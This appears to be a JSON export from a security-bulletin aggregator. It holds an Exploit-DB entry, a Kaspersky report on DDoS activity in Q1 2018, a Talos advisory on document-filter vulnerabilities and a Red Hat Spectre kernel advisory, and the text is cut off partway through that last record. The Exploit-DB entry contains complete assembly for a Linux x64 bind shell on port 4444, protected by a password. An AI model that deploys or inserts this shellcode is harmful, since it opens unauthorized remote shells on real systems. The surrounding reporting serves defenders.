{"result": {"exploitdb": [{"lastseen": "2018-02-02T14:53:11", "osvdbidlist": [], "references": [], "description": "Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes). Shellcode exploit for Linux_x86-64 platform", "edition": 1, "reporter": "Exploit-DB", "published": "2018-11-09T00:00:00", "title": "Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes)", "type": "exploitdb", "enchantments": {"score": null}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-11-09T00:00:00", "id": "EDB-ID:43951", "href": "https://www.exploit-db.com/exploits/43951/", "sourceData": "global _start\r\n\r\n_start:\r\n\r\n\t; sock = socket(AF_INET, SOCK_STREAM, 0)\r\n\t; AF_INET = 2\r\n\t; SOCK_STREAM = 1\r\n\t; syscall number 41 \r\n\r\n\tpush 41\r\n\tpop rax\r\n\tpush 2\r\n\tpop rdi\r\n\tpush 1\r\n\tpop rsi\r\n\tcdq\r\n\tsyscall\r\n\t\r\n\t; copy socket descriptor to rdi for future use \r\n\r\n\txchg rdi,rax\r\n\r\n\t; server.sin_family = AF_INET \r\n\t; server.sin_port = htons(PORT)\r\n\t; server.sin_addr.s_addr = INADDR_ANY\r\n\t; bzero(&server.sin_zero, 8)\r\n\r\n\tpush rdx\r\n\tmov dx,0x5c11\r\n\tshl rdx,16\r\n\txor dl,0x2\r\n\tpush rdx\r\n\r\n\t; bind(sock, (struct sockaddr *)&server, sockaddr_len)\r\n\t; syscall number 49\r\n\r\n\tmov rsi, rsp\r\n\tmov al,49\r\n\tpush 16\r\n\tpop rdx\r\n\tsyscall\r\n\r\n\t; listen(sock, MAX_CLIENTS)\r\n\t; syscall number 50\r\n\r\n\tpush 50\r\n\tpop rax\r\n\tpush 2\r\n\tpop rsi\r\n\tsyscall\r\n\r\n\t; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)\r\n\t; syscall number 43\r\n\r\n\tmov al,43\r\n\tsub rsp,16\r\n\tmov rsi,rsp\r\n\tpush 16\r\n\tmov rdx,rsp\r\n\tsyscall\r\n\r\n\t; close parent\r\n\t;push 3\r\n\t;pop rax\r\n\t;syscall\r\n\r\n\t; duplicate sockets\r\n\r\n\t; dup2 (new, old)\r\n\txchg rdi,rax\r\n\tpush 3\r\n\tpop rsi\r\ndup2cycle:\r\n\tmov al, 33\r\n\tdec esi\r\n\tsyscall\r\n\tloopnz dup2cycle\r\n\r\n\t; read passcode\r\n\t; xor rax,rax - already zeroed from prev cycle\r\n\txor rdi,rdi\r\n\tpush rax\r\n\tmov rsi,rsp\r\n\tpush 8\r\n\tpop rdx\r\n\tsyscall\r\n\r\n\t; Authentication with password \"1234567\"\r\n\txchg rcx,rax\r\n\tmov rbx,0x0a37363534333231\r\n\tpush rbx\r\n\tmov rdi,rsp\r\n\trepe cmpsb\r\n\tjnz wrong_pwd\r\n\r\n\t; execve stack-method\r\n\r\n\tpush 59\r\n\tpop rax\r\n\tcdq ; extends rax sign into rdx, zeroing it out\r\n\tpush rdx\r\n\tmov rbx,0x68732f6e69622f2f\r\n\tpush rbx\r\n\tmov rdi,rsp\r\n\tpush rdx\r\n\tmov rdx,rsp\r\n\tpush rdi\r\n\tmov rsi,rsp\r\n\tsyscall\r\n\r\nwrong_pwd:\r\n\tnop", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/43951/"}], "securelist": [{"lastseen": "2018-04-26T10:42:26", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "description": "\n\n## News overview\n\nIn early January, it was reported that an amateur hacker had come close to pulling off a [botnet attack](<https://www.scmagazineuk.com/huawei-router-vulnerability-exploited-most-are-unlikely-to-be-patched/article/734743/>) using \"improvised\" materials. Armed with information gleaned from hacker forums, the DIYer created a Trojan using a zero-day exploit in Huawei routers and released it online. The attack was soon nipped in the bud, but the wannabe cybercriminal could not be traced.\n\nOther slightly weightier news: first, experts reported growth in the [Reaper (or IoTroop)](<https://www.networksasia.net/article/should-you-fear-reaper.1515387121>) botnet (not to be confused with North Korean hacker group The Reaper), first discovered last quarter; second, IT security resources hinted at the emergence of new \"strains\" of Mirai and Satori (the latter, known as Okiru, is intended for ARC processors), but so far without details. Moreover, in early February a platform selling [JenX botnet](<https://www.scmagazineuk.com/jenx-botnet-using-video-game-to-recruit-iot-devices/article/741884/>) services was detected and neutralized. JenX was found to be using a fan server for the video game GTA: San Andreas as its C&C. In terms of power, JenX was nothing to write home about, but the originality of its creators deserves a mention. On the topic of original botnets, another worth noting is [DoubleDoor](<https://www.bleepingcomputer.com/news/security/doubledoor-botnet-chains-exploits-to-bypass-firewalls/>): the first known piece of \"wild\" malware to bundle two IoT vulnerabilities together.\n\nAs for new methods and vulnerabilities, besides the multiget hole in Memcached, last quarter news broke of a vulnerability in [WordPress](<https://www.scmagazineuk.com/serious-dos-flaw-spotted-in-wordpress-platform\u2013affects-most-versions/article/742562/>) that makes it easy to down a web server. Fortunately, no in-the-wild attacks were observed.\n\nThe attack targets for this new weaponry remained largely the same. Profit is still the main motive behind DDoS attacks (the number of attacks on business in Russia alone [doubled](<https://www.kaspersky.ru/about/press-releases/2017_increase-in-the-number-of-ddos-attacks-on-russian-business>) in 2017), although high-profile \"commercial\" attacks in the last three months were not so numerous. Within the space of three days in early February, players of [Final Fantasy](<https://www.scmagazine.com/final-fantasy-network-recovers-after-losing-health-points-to-ddos-attack/article/742432/>) encountered problems signing into certain services. At roughly the same time, BusinessWire experienced similar difficulties lasting more than a week, during which period neither editors nor readers could access the news portal. There was no reported ransom demand, so the motive behind the attack can be assumed to be competition-related.\n\nIt would be amiss not to mention a series of attacks that hit GitHub and an unknown service provider in early March, which produced record volumes of garbage traffic \u2014 over 1 TB/s. This capacity was achieved by leveraging Memcached, a popular caching service for Linux servers. Interestingly, in some of these attacks the garbage traffic itself contained ransom demands in Monero.\n\nPolitical motives are less common, but often more visible due to their topicality. The most headlining incident of late was, of course, the threat to [sabotage](<http://www.computerweekly.com/news/252434847/PyeongChang-Winter-Games-hit-by-cyber-attack>) the opening ceremony of the Winter Olympics in early February, most likely through a DDoS offensive. Even before that, in late January, the US Department of Defense repelled an influx of spam, and in late March their Russian counterparts had to survive a DDOS attack. In addition, experts reported that North Korean group The Reaper was extending its reach. Despite not showing any DDoS activity, it could soon start moving in that direction.\n\nAnother hard-hitting DDoS attack on major financial institutions in the Netherlands was initially thought to be political, but on closer inspection turned out to be pure [hooliganism](<http://www.nuwireinvestor.com/lessons-dutch-banking-attacks-prevent-ddos-attacks/>): Dutch police arrested a teen suspect for causing week-long mayhem at several banks simply to prove that it was possible.\n\nDDoS is also becoming more popular as a means of personal revenge. California, for instance, witnessed the case of David Goodyear, who was found guilty of trying to launch a DDoS attack against an amateur astronomy forum when it blacklisted him for using bad language. True, he can't be accused of not trying other methods before turning his hand to cybercrime: Goodyear repeatedly registered on the forum under different chat names, but each time earned himself a ban for boorish behavior.\n\n## Quarter trends\n\nDue to its capacity and relative accessibility, Memcached was the springboard for last quarter's most sensational attacks. However, it could prove to be a short-lived trend, and here's why.\n\nIn late February, Kaspersky DDoS Protection support was contacted by a company reporting an unusually high load on its communications channel in what it suspected to be a DDoS attack.\n\nAt first glance, the picture did indeed resemble a typical DDoS attack: the channel was clogged up, and users couldn't access the company's services. However, our investigation revealed that a CentOS Linux server with a vulnerable Memcached service was installed on one of the client servers. This service, used by the cybercriminals during the attack, generated large amounts of outgoing traffic, overloading the channel. In other words, the client was not the target, but an unwitting accomplice in the DDoS attack: the attackers used its server as an amplifier. After Kaspersky Lab's recommendations were implemented, the malicious parasitic traffic stopped.\n\nThis situation is typical for Memcached attacks: owners of vulnerable servers hijacked during attacks notice the load increase and rush to patch any vulnerabilities not to suffer even more downtime losses. As a result, the number of vulnerable servers that can be utilized for this type of attack is rapidly declining, for which reason Memcached attacks will likely dry up soon.\n\nStill, the picture in Q1 shows that \"amplified\" attacks, which were on the wane, have again picked up momentum. NTP and DNS-based boosting has practically disappeared, since most vulnerable services have already been patched. Cybercriminals will likely seek out other non-standard amplification methods besides Memcached. Last quarter, for instance, we registered a quite rare (yet effective) type of amplification attack, in which the LDAP service was used as an amplifier. Alongside Memcached, NTP, and DNS, this service has one of the biggest amplification factors. Despite the relatively small number of LDAP servers available, this type of attack could be a hit on the shadow Internet in the coming months.\n\n## Statistics for botnet-assisted DDoS attacks\n\n### Methodology\n\nKaspersky Lab has extensive experience of combating cyber threats, including DDoS attacks of various complexity types and ranges. Company experts track the actions of botnets by using the DDoS Intelligence system.\n\nAs part of the [Kaspersky DDoS Protection](<http://kaspersky.ru/ddos-prevention>) solution, the DDoS Intelligence system intercepts and analyzes commands sent to bots from C&C servers; it does not require any user devices to be infected or cybercriminals to execute any actual commands.\n\nThis report contains DDoS Intelligence statistics for Q1 2018.\n\nIn the context of this report, it is assumed that an incident is a separate (single) DDoS-attack if the interval between botnet activity periods does not exceed 24 hours. For example, if one particular web resource was attacked by the same botnet in two waves with an interval of 24 hours or more, the incident is considered as two attacks. Bot requests originating from different botnets but directed at one resource also count as separate attacks.\n\nThe geographical locations of DDoS-attack victims and C&C servers used to send commands are determined by their respective IP addresses. The number of unique targets of DDoS attacks in this report is counted by the number of unique IP addresses in the quarterly statistics.\n\nDDoS Intelligence statistics are limited to botnets detected and analyzed by Kaspersky Lab. Note that botnets are just one of the tools for performing DDoS attacks, and that the data presented in this report do not cover every single DDoS attack that occurred during the period under review.\n\n### Quarter results\n\n * In Q1 2018, DDoS attacks were registered against targets in 79 countries (84 in the previous quarter). As ever, the vast majority (95.14%) occurred in the top ten countries.\n * As for attack targets, as usual about half were located in China (47.53%), although the share was somewhat lower against the previous quarter.\n * The number of attacks and targets rose significantly, as did the number of long-duration attacks. The most sustained DDoS attack lasted 297 hours (more than 12 days), making it one of the longest in recent years.\n * The share of Linux botnets fell slightly to 66% against the previous quarter's 71%.\n * Significant peaks in the number and power of cyberattacks were observed in mid-January and early March, while the mid-quarter period was relatively calm.\n\n### Geography of attacks\n\nChina easily retained pole position by number of attacks: its share remained almost unchanged, up from 59.18% to 59.42%. The US share (17.83%), the second largest, increased by a more noticeable 1.83%. South Korea again took bronze, but its share fell by more than 2%, from 10.21% to 8%.\n\nBritain (1.30%) moved from fourth to fifth. Tenth place in Q1 2018 went to Russia, whose share decreased from 1.25% to 0.76%. The Netherlands and Vietnam dropped out of the top ten, but Hong Kong (with a solid 3.67% against 0.67% in Q4 2017) and Japan (1.16%) reappeared.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/26083748/180426-ddos-report-q1-2018-en-1.png>)\n\n_Distribution of DDoS attacks by country, Q1 2018 and Q4 2017_\n\nAs regards the distribution of attack targets, top spot again belongs to China, although its share declined from 51.84% to 47.53%. Meanwhile, the still second-place US saw its share increase from 19.32% to 24.10%. Third position was taken by South Korea (9.62%). France's ranking changed significantly: shedding just 0.65% this quarter, it dropped from fifth to ninth place.\n\nThe list of top ten most attacked countries said goodbye to Russia and the Netherlands, but welcomed Hong Kong (4.76%) straight into fourth place, and Japan (1.6%) into sixth. Overall this quarter, the total share of top ten countries increased slightly to 94.17% against 92.9% at the end of 2017.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/26083758/180426-ddos-report-q1-2018-en-2.png>)\n\n_Distribution of unique DDoS-attack targets by country, Q4 2017 and Q1 2018_\n\n### Dynamics of the number of DDoS attacks\n\nMost Q1 activity occurred in the first and last third. The number of attacks peaked on January 19 (666) and March 7 (687 attacks). This is probably linked to the end of the New Year holidays (the number of attacks began to rise around the second week of January) and the March sales (in connection with International Women's Day). The quietest days were observed at roughly the same time: January 16 and March 11. The mid-quarter period passed relatively smoothly without significant peaks or noticeable declines.\n\nThe calmest day of the week in the latest quarter was Sunday, accounting for just 11.35% of all attacks. \n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/26083807/180426-ddos-report-q1-2018-en-3.png>)\n\n_Distribution of DDoS attacks by day of the week, Q4 2017 and Q1 2018_\n\n### Types and duration of DDoS attacks\n\nThe share of SYN-DDOS attacks increased slightly (from 55.63% to 57.3%), but there was no repeat of the situation seen in previous quarters. The share of ICMP attacks almost doubled, from 3.4% to 6.1%. Accordingly, UDP, TCP and HTTP floods were forced to cede some ground: their shares dropped by 1-2% against the previous quarter.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/26083816/180426-ddos-report-q1-2018-en-4.png>)\n\n_Distribution of DDoS attacks by type, Q1 2018_\n\nAfter some respite at the end of 2017, we saw a return of sustained attacks: the longest lasted 297 hours (12.4 days). And although that falls short of the world record, the magnitude is still considerable. We have to go back to late 2015 for a longer attack.\n\nThe share of all other sustained attacks (50 hours or more) increased by more than six times, from 0.10% to 0.63%. At the other end of the spectrum, the share of the shortest attacks (9 hours or less) also grew: if last quarter they accounted for 85.5% of all attacks, now the figure stands at 91.47%. Meanwhile, the number of attacks lasting between 10 hours and three days in the latest quarter almost halved from 14.85% to 7.76%.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/26083825/180426-ddos-report-q1-2018-en-5.png>)\n\n_Distribution of DDoS attacks by duration (hours), Q4 2017 and Q1 2018_\n\nThe top ten countries by number of C&C servers last quarter underwent a major reshuffle: Canada, Turkey, Lithuania, and Denmark dropped out, while Italy, Hong Kong, Germany, and Britain climbed upwards. The top three remained practically unchanged: South Korea (30.92%), the US (29.32%), China (8.03%). Only Russia (2.01%), having shared bronze with China in late 2017, slid down to ninth place.\n\nThe US share almost doubled, bringing it within touching distance of this ranking's perennial leader South Korea. In addition, the shares of Italy (6.83%), which last quarter did not even make the top ten, the Netherlands (5.62%), and France (3.61%) increased significantly. This jump was due to a sharp rise in the number of C&C accounts for Darkai (in the US, Italy, the Netherlands, and France) and AESDDoS (in China) bots.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/26083834/180426-ddos-report-q1-2018-en-6.png>)\n\n_Distribution of botnet C&C servers by country, Q1 2018_\n\nThe share of Linux botnets last quarter fell slightly compared to the end of 2017, down to 66% from 71%. Accordingly, the share of Windows-based botnets climbed from 29% to 34%.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/26083843/180426-ddos-report-q1-2018-en-7.png>)\n\n_Correlation between Windows- and Linux-based botnet attacks, Q1 2018_\n\n## Conclusion\n\nIn Q1 2018, we observed a significant increase in both the total number and duration of DDoS attacks against Q4 2017. The new Linux-based botnets Darkai (a Mirai clone) and AESDDoS are largely responsible for this hike. The number of now familiar Xor attacks also rose. Neither did Windows-based botnets remain idle, making some headway against Linux in the total number of attacks. The old Yoyo botnet was particularly lively, almost five times as active.\n\nThe number of mixed attacks involving several botnet families also increased. This is a clear continuation of the trend that we spoke about at the end of last year: to optimize outlays, attackers utilize unused parts of botnets to generate garbage traffic, redeploying them across targets.\n\nAmplified attacks returned to the cyber arena, particularly through the Memcached service. However, we expect that server owners will quickly spot the abundance of garbage traffic and patch up the vulnerabilities, which will dent the popularity of attacks of this type. That being the case, DDoS masterminds will likely seek out other amplification methods, one of which could be LDAP services.", "reporter": "Alexander Khalimonenko", "published": "2018-04-26T10:00:30", "type": "securelist", "title": "DDoS attacks in Q1 2018", "enchantments": {}, "bulletinFamily": "blog", "cvelist": [], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-04-26T10:00:30", "id": "SECURELIST:4EE90829FD3DF230644DD3D165180DAB", "href": "https://securelist.com/ddos-report-in-q1-2018/85373/", "cvss": {"score": 0.0, "vector": "NONE"}}], "talosblog": [{"lastseen": "2018-04-26T14:39:05", "_object_types": ["robots.models.base.Bulletin", "robots.models.rss.RssBulletin"], "references": [], "description": "Vulnerabilities discovered by Marcin 'Icewall' Noga from Talos \n\n\n### Overview\n\n \n\n\nTalos has discovered multiple vulnerabilities in Hyland Perceptive Document Filters software. This software is a toolkit that allows developers to read and extract metadata from a file. It supports a large set of common file formats. In addition to this the software is also capable of converting file formats. \n \nWe identified 4 vulnerabilities that allows an attacker to execute arbitrary code on the vulnerable systems. These vulnerabilities concerns the file conversion features. \n \nThe vulnerabilities can be exploited to locally execute code as well as remotely if the framework is used in batch mode by the owners. In this context, the malicious crafted document could be automatically handled by the toolkit and a successful exploitation could result full control of the vulnerable system. The vulnerable features can be used for big data, eDiscovery, DLP, email archival, content management, business intelligence and intelligent capture services. It can convert common formats such as Microsoft's document formats into other format (for example easier to be parsed). \n \n \n \n\n\n## Details\n\n### Code Execution\n\n \n\n\n#### TALOS-2018-0538 (CVE-2018-3855) - Hyland Perceptive Document Filters DOC to HTML updateNumbering Code Execution Vulnerability\n\n \nThis vulnerability impacts the conversion of DOC document to HTML file. A specially crafted DOC file can lead to a stack based buffer overflow and remote code execution. \n \nMore details can be found in the vulnerability report: \n \n[TALOS-2018-0538](<http://www.talosintelligence.com/reports/TALOS-2018-0538>) \n \n\n\n#### TALOS-2018-0527 (CVE-2018-3844) - Hyland Perceptive Document Filters DOCX to HTML Code Execution Vulnerability\n\n \nThis vulnerability impacts the conversion of DOCX document to HTML file. A specially crafted DOCX file can lead to a use-after-free and remote code execution. \n \nMore details can be found in the vulnerability report: \n \n[TALOS-2018-0527](<http://www.talosintelligence.com/reports/TALOS-2018-0527>) \n \n\n\n#### TALOS-2018-0528 (CVE-2018-3845) - Hyland Perceptive Document Filters OpenDocument to JPEG conversion SkCanvas Code Execution vulnerability\n\n \nThis vulnerability impacts the conversion of OpenDocument to JPEG file. A crafted OpenDocument document can lead to a SkCanvas object double free resulting in direct code execution. \n \nMore details can be found in the vulnerability report: \n \n[TALOS-2018-0528](<http://www.talosintelligence.com/reports/TALOS-2018-0528>) \n \n\n\n#### TALOS-2018-0534 (CVE-2018-3851) - Hyland Perceptive Document Filters Microsoft Word CDATA Code Execution Vulnerability\n\n \nThere is a vulnerability in the conversion process of a Microsoft Word (xml) to JPG, HTML5 and couple more formats. A specially crafted Microsoft Word (xml) file can lead to heap corruption and remote code execution. \n \nMore details can be found in the vulnerability report: \n \n[TALOS-2018-0534](<http://www.talosintelligence.com/reports/TALOS-2018-0534>) \n \n\n\n## Tested Versions:\n\n \nPerceptive Document Filters 11.4.0.2647 - x86/x64 Windows/Linux \nPerceptive Document Filters 11.2.0.1732 - x86/x64 Windows/Linux \n \n\n\n## Coverage\n\n \nThe following Snort rules will detect exploitation attempts. Note that additional rules may be released at a future date, and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org. \n \nSnort Rules: 45689, 45690, 45717, 45718, 45750, 45751 \n \n\n\n[](<http://feeds.feedburner.com/~ff/feedburner/Talos?a=X7SbVvpKh3I:RvjMjFIpYuE:yIl2AUoC8zA>)\n\n", "reporter": "noreply@blogger.com (Paul Rascagneres)", "published": "2018-04-26T06:54:00", "type": "talosblog", "title": "Vulnerability Spotlight: Hyland Perceptive Document Filters Multiple Vulnerabilites", "enchantments": {}, "bulletinFamily": "blog", "cvelist": ["CVE-2018-3844", "CVE-2018-3845", "CVE-2018-3851", "CVE-2018-3855"], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-04-26T14:05:33", "id": "TALOSBLOG:7938478BFF4F92044CB8D23AEC59BD00", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/X7SbVvpKh3I/hyland-vulnerabilities-code-execution.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "redhat": [{"lastseen": "2018-04-25T21:11:59", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "i686", "packageName": "kernel", "packageFilename": "kernel-2.6.18-348.39.1.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "ia64", "packageName": "kernel", "packageFilename": "kernel-2.6.18-348.39.1.el5.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "src", "packageName": "kernel", "packageFilename": "kernel-2.6.18-348.39.1.el5.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "x86_64", "packageName": "kernel", "packageFilename": "kernel-2.6.18-348.39.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "i686", "packageName": "kernel-PAE", "packageFilename": "kernel-PAE-2.6.18-348.39.1.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "i686", "packageName": "kernel-PAE-debuginfo", "packageFilename": "kernel-PAE-debuginfo-2.6.18-348.39.1.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "i686", "packageName": "kernel-PAE-devel", "packageFilename": "kernel-PAE-devel-2.6.18-348.39.1.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "i686", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.18-348.39.1.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "ia64", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.18-348.39.1.el5.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "x86_64", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.18-348.39.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "i686", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-2.6.18-348.39.1.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "ia64", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-2.6.18-348.39.1.el5.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "x86_64", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-2.6.18-348.39.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "i686", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.18-348.39.1.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "ia64", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.18-348.39.1.el5.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "x86_64", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.18-348.39.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "i686", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-2.6.18-348.39.1.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "ia64", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-2.6.18-348.39.1.el5.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "x86_64", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-2.6.18-348.39.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "i686", "packageName": "kernel-debuginfo-common", "packageFilename": "kernel-debuginfo-common-2.6.18-348.39.1.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "ia64", "packageName": "kernel-debuginfo-common", "packageFilename": "kernel-debuginfo-common-2.6.18-348.39.1.el5.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "x86_64", "packageName": "kernel-debuginfo-common", "packageFilename": "kernel-debuginfo-common-2.6.18-348.39.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "i686", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.18-348.39.1.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "ia64", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.18-348.39.1.el5.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "x86_64", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.18-348.39.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "noarch", "packageName": "kernel-doc", "packageFilename": "kernel-doc-2.6.18-348.39.1.el5.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "i386", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.18-348.39.1.el5.i386.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "ia64", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.18-348.39.1.el5.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "x86_64", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.18-348.39.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "i686", "packageName": "kernel-xen", "packageFilename": "kernel-xen-2.6.18-348.39.1.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "ia64", "packageName": "kernel-xen", "packageFilename": "kernel-xen-2.6.18-348.39.1.el5.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "x86_64", "packageName": "kernel-xen", "packageFilename": "kernel-xen-2.6.18-348.39.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "i686", "packageName": "kernel-xen-debuginfo", "packageFilename": "kernel-xen-debuginfo-2.6.18-348.39.1.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "ia64", "packageName": "kernel-xen-debuginfo", "packageFilename": "kernel-xen-debuginfo-2.6.18-348.39.1.el5.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "x86_64", "packageName": "kernel-xen-debuginfo", "packageFilename": "kernel-xen-debuginfo-2.6.18-348.39.1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "i686", "packageName": "kernel-xen-devel", "packageFilename": "kernel-xen-devel-2.6.18-348.39.1.el5.i686.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "ia64", "packageName": "kernel-xen-devel", "packageFilename": "kernel-xen-devel-2.6.18-348.39.1.el5.ia64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.6.18-348.39.1.el5", "arch": "x86_64", "packageName": "kernel-xen-devel", "packageFilename": "kernel-xen-devel-2.6.18-348.39.1.el5.x86_64.rpm", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of instructions (a commonly used performance optimization). There are three primary variants of the issue which differ in the way the speculative execution can be exploited. Variant CVE-2017-5715 triggers the speculative execution by utilizing branch target injection. It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory accesses may cause allocation into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to cross the syscall and guest/host boundaries and read privileged memory by conducting targeted cache side-channel attacks. (CVE-2017-5715, Important, x86-64)\n\n* kernel: exec/ptrace: get_dumpable() incorrect tests (CVE-2013-2929, Low)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Google Project Zero for reporting CVE-2017-5715.\n\nBug Fix(es):\n\n* The Return Trampolines (Retpolines) mechanism is a software construct that leverages specific knowledge of the underlying hardware to mitigate the branch target injection, also known as Spectre variant 2 vulnerability described in CVE-2017-5715. With this update, the support for Retpolines has been implemented into the Red Hat Enterprise Linux kernel. (BZ#1539655)", 